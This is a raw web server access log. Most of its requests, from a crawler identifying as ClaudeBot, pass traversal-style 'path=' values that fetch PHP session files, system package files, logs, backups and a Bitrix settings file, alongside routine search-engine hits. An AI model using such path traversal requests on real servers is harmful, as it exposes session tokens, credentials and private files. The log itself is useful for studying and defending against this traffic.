216.73.216.215 - - [13/Jan/2026:06:57:01 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_e5b60fdc204a55bfc6ac4189733bc92d HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:04 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Fntpdate%2F..%2F.%2Fghostscript%2FCMap%2F.%2FUniKS-UTF8-H HTTP/1.0" 200 55032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:07 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2F.%2Furandom%2F..%2Fsnmp%2F. HTTP/1.0" 200 1964 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:10 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_e5b60fdc204a55bfc6ac4189733bc92d HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:13 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_3bc89d537838942e6d986fb3708042e8 HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:16 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_635df1ae31aa4fbe760e7a3435b208d4 HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:19 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fphpmyadmin%2F..%2Fsystemd%2F.%2F.%2Fdeb-systemd-helper-enabled%2Ftimers.target.wants HTTP/1.0" 200 1986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:52:01 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393932312p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363332312q3336333630363332383736616164373235383361656532363966333337356333222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:57:22 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_2593eb5e09f49f27e4ba8ece8eef03a5 HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:25 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_3bc89d537838942e6d986fb3708042e8 HTTP/1.0" 200 1637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:06:57:26 +0300] "GET /?product=1012086553 HTTP/1.0" 200 24946 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:06:57:28 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fucf%2F..%2Fghostscript%2FCMap%2F.%2FHKgccs-B5-V HTTP/1.0" 200 2674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:31 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_853f1acd1dbcfc52b6697fcc36aa3f4e HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:34 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_b1f0d89c09a3b67dbb7899591bb77e6e HTTP/1.0" 200 1629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:37 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_853f1acd1dbcfc52b6697fcc36aa3f4e HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:40 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_7a4cb9cf4b730c433c708bb640bc8e93 HTTP/1.0" 200 1387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:52:22 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393934322p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363334322q6236333030613931316533616536383930303465663161386666663961656438222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:57:43 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_7a4cb9cf4b730c433c708bb640bc8e93 HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.7 - - [13/Jan/2026:06:57:44 +0300] "GET /pcmypage?callback=product/review/T1790424472 HTTP/1.0" 200 28601 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:57:46 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_7a4cb9cf4b730c433c708bb640bc8e93 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:49 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2Fntpdate%2F..%2F.%2Fghostscript%2FCMap%2F.%2FUniKS-UTF32-V HTTP/1.0" 200 2741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:52 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_b14f11fb34c0cc5eeb808b9d88c19de3 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.48 - - [13/Jan/2026:06:57:54 +0300] "GET /?product=2005070766 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:06:57:55 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_b14f11fb34c0cc5eeb808b9d88c19de3 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:57:58 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_b14f11fb34c0cc5eeb808b9d88c19de3 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.43 - - [13/Jan/2026:06:57:57 +0300] "GET /product/1503447369.htm HTTP/1.0" 200 25551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.215 - - [13/Jan/2026:06:58:01 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_dcb9fe0e7388b7d116a08c839e80cde3 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:52:43 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393936332p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363336332q6664313863366336333261306431666131313835613031663632646266613039222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:58:04 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_dcb9fe0e7388b7d116a08c839e80cde3 HTTP/1.0" 200 1385 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:07 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_dcb9fe0e7388b7d116a08c839e80cde3 HTTP/1.0" 200 1383 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:10 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_b326f2f7ed32eb3b86d6bfde7a79eae7 HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:13 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_b326f2f7ed32eb3b86d6bfde7a79eae7 HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:16 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2F.%2Funattended-upgrades.conffiles HTTP/1.0" 200 1466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:19 +0300] "GET /072b9/?path=%2Fvar%2F.%2Ftmp-isp-backup%2F..%2Flog%2Fnginx%2F.%2Faccess.log.41.gz HTTP/1.0" 200 1396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:22 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_d031c4243fde15b6357cd3f77e99bb67 HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:25 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Fsess_ea75065ebd2bce294bb080c5832472c1 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:53:04 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383237393938342p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363338342q3462613734383332353134343335343565653363393862303436326131646636222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:58:28 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_313e2aed54dc295792b1714420facdfa HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:31 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Fsess_ea75065ebd2bce294bb080c5832472c1 HTTP/1.0" 200 1384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:34 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_313e2aed54dc295792b1714420facdfa HTTP/1.0" 200 1636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:37 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Fsess_ea75065ebd2bce294bb080c5832472c1 HTTP/1.0" 200 1386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:40 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_c681cdc572dd152f26f736d5558568ad HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:43 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2Fsess_eab33dd70c9f5a4c8eb73ce94bf744ff HTTP/1.0" 200 1634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:46 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_eab33dd70c9f5a4c8eb73ce94bf744ff HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:53:26 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383238303030362p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363430362q6362313836653036656462656364343964306335346463323365303630653939222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:58:51 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2F.%2Fbase-passwd.postinst HTTP/1.0" 200 2673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:54 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Finitscripts%2F..%2Fdpkg%2Finfo%2Flibmpdec2%3Aamd64.postinst HTTP/1.0" 200 1482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:58:57 +0300] "GET /072b9/?path=%2Fvar%2Ftmp%2F..%2Ffiles%2Fmedcompftp%2Ftestsite_ftp%2FTORG12_23133_2016.PDF HTTP/1.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:00 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2Flibgs9.postinst HTTP/1.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.20.17 - - [13/Jan/2026:06:59:00 +0300] "GET /?product=2004756682 HTTP/1.0" 500 185 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.215 - - [13/Jan/2026:06:59:03 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2Flibatomic1%3Aamd64.postinst HTTP/1.0" 200 1483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
17.241.219.196 - - [13/Jan/2026:06:59:03 +0300] "GET /product/518303207.htm HTTP/1.0" 500 185 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.216.215 - - [13/Jan/2026:06:59:06 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Flogrotate%2F.%2F..%2Ftex-common HTTP/1.0" 200 1890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:53:47 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383238303032372p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363432372q3931663438616639663234623838383134386139613133323163376436353033222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:59:09 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Finitscripts%2F..%2Fdpkg%2Finfo%2Flibcwidget3%3Aamd64.shlibs HTTP/1.0" 200 1404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:12 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Flogrotate%2F..%2F.%2Ftex-common HTTP/1.0" 200 1893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:15 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Faptitude%2F..%2Fghostscript%2F.%2FCMap%2FAdobe-Japan1-H-Host HTTP/1.0" 200 4700 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:18 +0300] "GET /072b9/?path=%2Fvar%2Flog%2Fzabbix%2F..%2Ffail2ban.log.2.gz HTTP/1.0" 200 1370 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:21 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2F..%2Fbackup%2Feximlog%2Fmainlog HTTP/1.0" 200 1380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:24 +0300] "GET /072b9/?path=%2Fvar%2Fwww%2Ftiskom%2Fdata%2Fwww%2Ftiskom.xhost.intravision.ru%2Fbitrix%2Fmanaged_cache%2F..%2F.settings.php HTTP/1.0" 200 1838 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.64 - - [13/Jan/2026:06:59:24 +0300] "GET /?product=1341670418 HTTP/1.0" 200 25690 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.215 - - [13/Jan/2026:06:59:27 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2Fspamassassin%2F..%2Faspell%2Fru.remove HTTP/1.0" 200 1397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:54:08 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383238303034382p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363434382q3464366262663564616134303634363132323538323739373161636364623065222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:59:30 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2Flibjs-jquery.md5sums HTTP/1.0" 200 1621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:33 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2Flib%2F..%2Fbackup%2Fexternal_www%2Fnew02.medcomp.ru%2Fpma%2Ftbl_sql.php HTTP/1.0" 200 1882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:36 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2F.%2Fsystemd%2F..%2F.%2Fucf%2Fhashfile.3 HTTP/1.0" 200 3911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:39 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_f34d77130c49a42ff6db3d34d339b7cb HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:43 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2Fsess_d8989136c9ffe43520a2c3b7f0a4e8eb HTTP/1.0" 200 1635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:45 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Fapache2%2F..%2Fdpkg%2Finfo%2F.%2Fzabbix-agent.postinst HTTP/1.0" 200 1853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:48 +0300] "GET /072b9/?path=%2Fvar%2Flib%2Faptitude%2F..%2Fghostscript%2F.%2FCMap%2FHKm314-B5-H HTTP/1.0" 200 7280 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
127.0.0.1 - - [13/Jan/2026:06:54:29 +0300] "GET /podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/podbor-resheniya/index.php?ARRAY=7o2230223n313736383238303036392p2231223n22687474703n5p2s5p2s7n733634367631336o6s2r636s6s6o742r6p6976655p2s3s6p633q7068705s636s64655s6n6326743q313736383237363436392q3238383065346235353930323666363331323962393264323134343262653439222p2232223n223230383637333632333062613464633233653639313235313739363033383431222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231382q34342q36302q36352q37352q38342q3132227q HTTP/1.0" 200 191 "-" "-"
216.73.216.215 - - [13/Jan/2026:06:59:51 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_e1732b38d5ba8bb3f2f92f906f6686a5 HTTP/1.0" 200 1630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:54 +0300] "GET /072b9/?path=%2Fvar%2F.%2F.%2F..%2Ftmp%2Flogwatch.r3ufNXVS HTTP/1.0" 200 1619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:06:59:57 +0300] "GET /072b9/?path=%2Fvar%2F..%2F.%2Ftmp%2F.%2Flogwatch.r3ufNXVS HTTP/1.0" 200 1620 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:07:00:00 +0300] "GET /072b9/?path=%2Fvar%2F.%2F..%2Ftmp%2F.%2Flogwatch.r3ufNXVS HTTP/1.0" 200 1621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:07:00:03 +0300] "GET /072b9/?path=%2Fvar%2F..%2Ftmp%2Fsess_dabf2577b22078f4139b8e418a67759d HTTP/1.0" 200 1631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.215 - - [13/Jan/2026:07:00:06 +0300] "GET /072b9/?path=%2Fvar%2Flib%2F.%2F.%2F..%2Flib%2Fredis HTTP/1.0" 200 1915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
